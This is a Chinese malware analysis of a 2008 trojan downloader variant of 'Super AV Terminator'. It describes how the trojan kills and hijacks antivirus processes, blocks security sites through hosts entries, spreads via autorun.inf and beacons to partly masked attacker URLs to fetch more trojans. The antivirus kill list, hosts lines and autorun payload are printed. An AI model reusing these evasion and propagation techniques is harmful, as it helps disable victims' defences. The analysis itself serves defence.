12.11終結者定時器--對抗型木馬(Win32.TrojDownloader.Agent.ns.41984)
“終結者定時器41984”(Win32.TrojDownloader.Agent.ns.41984),這是一個對抗型的木馬下載器。它是近來流行的“超級AV 終結者”的一個變種,該係列下載器結合了AV終結者、機器狗、autorun病毒的特點,對網吧、企業等局域網用戶和個人用戶的影響都很大。
該下載器基本功能與不久前出現的“超級AV終結者”原始版本相同,都是利用各種對抗手段破壞用戶電腦的安全防禦、在電腦中駐紮,然後下載大量的盜號木馬。
這個變種具有時效性,毒霸反病毒工程師檢查後發現,病毒作者爲其設定的有效期爲2008-12-30,如果病毒發現係統時間已經是2009年,就會自動關閉。不過,這並不表示該毒在2009年就不會有威脅,因爲病毒作者可以發送遠程指令,隨時爲該毒升級。
該毒在穿透SSDT表後就關閉係統中的的安全軟件,並將它們的進程映像劫持,令它們癱瘓。同時禁止用戶訪問任何與電腦安全有關的網頁和使用係統自帶的全部安全工具。
當以上工作全部完成,該毒就連接到病毒作者指定的地址,下載大量的盜號木馬,下載量較之前的版本來說,更加龐大。
一、文件分析
1)母體dll
導出函數explore
獲取ShellExecuteA,並調用”exploreropen.”打開當前目錄。用於每個驅動器下打開目錄。
導出函數SchedServiceMain、ServiceMain、SvchostEntry_W32Time
a)檢測調試器:查找進程 OllyICE.exe,OllyDbg.exe,ImportREC.exe,C32Asm.exe,LordPE.exe,PEditor.exe等進程,如果存在則退出,不存在則調用IsDebuggerPresent,檢測當前是否被調試,是的話退出。
b)創建NSDownLoader26AVip20081207互斥體,並判斷是否存在,存在退出。
c)通過ring3下關卡巴進程。
d)釋放資源102到%sys32dir%\Nskhelper2.sys,並創建服務NsRk1,啓動,來恢複SSDT。
e)掃描當前係統進程列表,發現有安全軟件進程,就調用驅動中的ZwTerminateProcess將它關閉。
進程列表
pccguide.exeZONEALARM.exezonealarm.exewink.exe
windows優化大師.exeWFINDV32.exewebtrap.exeWEBSCANX.exe
WEBSCAN.exevsstat.exeVSSCAN40VSHWIN32.exevshwin32.exe
VSECOMR.exeVPC32.exevir.exeVETTRAY.exeVET95.exe
vavrunr.exeUlibCfg.exeTSC.exetmupdito.exetmproxy.exe
TMOAgent.exeTmntsrv.exeTDS2-NT.exeTDS2-98.exeTCA.exe
TBSCAN.exesymproxysvc.exeSWEEP95.exespy.exe
SPHINX.exesmtpsvc.exeSMC.exesirc32.exeSERV95.exe
secu.exeSCRSCAN.exescon.exeSCANPM.exeSCAN32.exescan.exe
scam32.exesafeweb.exesafeboxTray.exern.exeRfw.exe
rescue32.exeregedit.exeRavTask.exeRavStub.exe
RavMonD.exeRavMon.exerav7win.exeRAV7.exeras.exe
pview95.exeprot.exeprogram.exePpPpWallRun.exe
pop3trap.exePERSFW.exePCFWALLICON.exepccwin98.exe
pccmain.exepcciomon.exePCCClient.exepcc.exePAVCL.exe
PADMIN.exeOUTPOST.exeoffice.exeNVC95.exeNUPGRADE.exe
norton.exeNORMIST.exeNMAIN.exenisum.exenisserv.exe
NAVWNT.exenavwnt.exeNAVW32.exeNAVW.exeNAVSCHED.exenavrunr.exeNAVNT.exeNAVLU32.exenavapw32.exenavapsvc.exe
N32ACAN.exems.exeMPFTRAY.exeMOOLIVE.exemoniker.exe
mon.exemicrosoft.exemcafee.exeLUCOMSERVER.exeluall.exe
LOOKOUT.exelockdown2000.exelamapp.exekwatch.exe
KVPreScan.exeKVMonXP.exeKRF.exeKPPMain.exekpfwsvc.exe
kpfw32.exeKPFW32.exekissvc.exekavstart.exekav32.exe
Kasmain.exeKabackreport.exeJED.exeiomon98.exeiom.exe
ICSSUPPNT.exeICMOON.exeICLOADNT.exeICLOAD95.exe
IceSword.exeice.exeIBMAVSP.exeIBMASN.exeIAMSERV.exe
IAMAPP.exeF-STOPW.exef-stopw.exeFRW.exeFP-WIN.exefp-win.exe
f-prot95.exeF-PROT.exefir.exeFINDVIRU.exeF-AGNT95.exe
explorewclass.exeESPWATCH.exeESAFE.exeEFINET32.exeECENGINE.exe
DVP95.exeDV95_O.exeDV95.exedebu.exedbg.exeDAVPFW.exe
CLEANER3.exeCLEANER.exeCLAW95CT.exeCLAW95.execfinet32.exe
cfinet.exeCFIND.exeCFIAUDIT.exeCFIADMIN.exeCCenter.exe
BLACKICE.exeBLACKD.exeavxonsol.exeAVWIN95.exeavsynmgr.exe
AVSCHED32.exeAVPUPD.exeAVPTC32.exeAVPNT.exeAVPMON.exeAVPM.exeavpdos32.exeAVPCC.exeavp32.exeavp.exeAVKSERV.exeavk.exeAVGCTRL.exeAVE32.exeAVCONSOL.exeAUTODOWN.exeATRACK.exeatrack.exeAPVXDWIN.exeantivir.exeANTI-TROJAN.exeanti.exe
ACKWIN32.exe360tray.exe360safe.exe_AVPM.exe_AVPCC.exe
_AVP32.exe
f)映像劫持以上進程,並指svchost.exe.
g)獲取當前機子的MAC地址和操作係統版本及運行時間,向指定網址發信。
http://chi...1.3**2.org/3/Count.asp?mac=00-00-00-00-00-00&os=WinXP&ver=2...
h)解密網址
http://w...-1***3.com/count.txt和
http://chi...1.3**2.org/3.txt,下載裏面的病毒到%temp%目錄,並依次運行。
i)遍曆驅動器,在非a:\和b:\驅動器根目錄下創建autorun.inf,先判斷autorun.inf是否已存在文件或文件夾,存在先刪除,在創建,並將自身複制過去命名爲system.dll,autorun.inf中調用system.dll的導出函數explore.
[autorun]
shell\open\command=rundll32system.dll,explore
shell\explore\command=rundll32system.dll,explore
j)釋放資源105到%sys32dir%\appwinproc.dll,將其遠程線程注入到explorer.exe進程中。
k)修改hosts文件,屏蔽安全軟件網址。
127.0.0.1www.360.cn
127.0.0.1www.360safe.cn
127.0.0.1www.360safe.com
127.0.0.1www.chinakv.com
127.0.0.1www.rising.com.cn
127.0.0.1rising.com.cn
127.0.0.1dl.jiangmin.com
127.0.0.1jiangmin.com
127.0.0.1www.jiangmin.com
127.0.0.1www.duba.net
127.0.0.1www.eset.com.cn
127.0.0.1www.nod32.com
127.0.0.1shadu.duba.net
127.0.0.1union.kingsoft.com
127.0.0.1www.kaspersky.com.cn
127.0.0.1kaspersky.com.cn
127.0.0.1virustotal.com
127.0.0.1www.kaspersky.com
127.0.0.1www.cnnod32.cn
127.0.0.1www.lanniao.org
127.0.0.1www.nod32club.com
127.0.0.1www.dswlab.com
127.0.0.1bbs.sucop.com
127.0.0.1www.virustotal.com
127.0.0.1tool.ikaka.com
127.0.0.1360.qihoo.com
j)將係統服務lanmanserver和Browser設置爲手動,並將其開啓。
k)釋放資源103到%sys32dir%下命名爲NsPass?.sys(?爲0、1、2依次類推),並創建對應的服務NsPsDk??(??爲00、01、02),並啓動,直接訪問磁盤並將自己寫入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驅動創建個數與上面文件寫入有關,若正常寫入驅動將爲5個與其對應,某個dll沒有正常寫入,下次重啓會多加一個驅動。
導出函數DllEntryPoint
a)判斷當前是否注入svchost.exe,且時間是否在2008-12-30以前,是的話跳入主功能線程,否則不注入。同導出函數SchedServiceMain、ServiceMain、SvchostEntry_W32Time。
b)若不是,釋放資源102回複ssdt,關閉殺軟進程,然後ring3關卡巴,自己創建一個svchost.exe進程,將自身創建遠程線程注入。
2)釋放的資源102sys(Nskhelper2.sys)
恢複SSDT,並結束指定進程。
3)釋放的資源103sys(NsPass?.sys)
直接訪問磁盤並將自己寫入以下dll文件
%sys32dir%\schedsvc.dll
%sys32dir%\appmgmts.dll
%sys32dir%\srsvc.dll
%sys32dir%\w32time.dll
%sys32dir%\wiaservc.dll
驅動創建個數與上面文件寫入有關,若正常寫入驅動將爲5個與其對應,某個dll沒有正常寫入,下次重啓會多加一個驅動。
4)釋放的資源104dll(appwinproc.dll)
a)HookWM_MOVE,當有程序調用時,該dll被載入。
b)獲取窗口,當發現有金山毒霸,360安全衛士,江民,木馬,專殺,下載者,NOD32,卡巴斯基字樣的窗口,則調TerminateProcess將其關閉。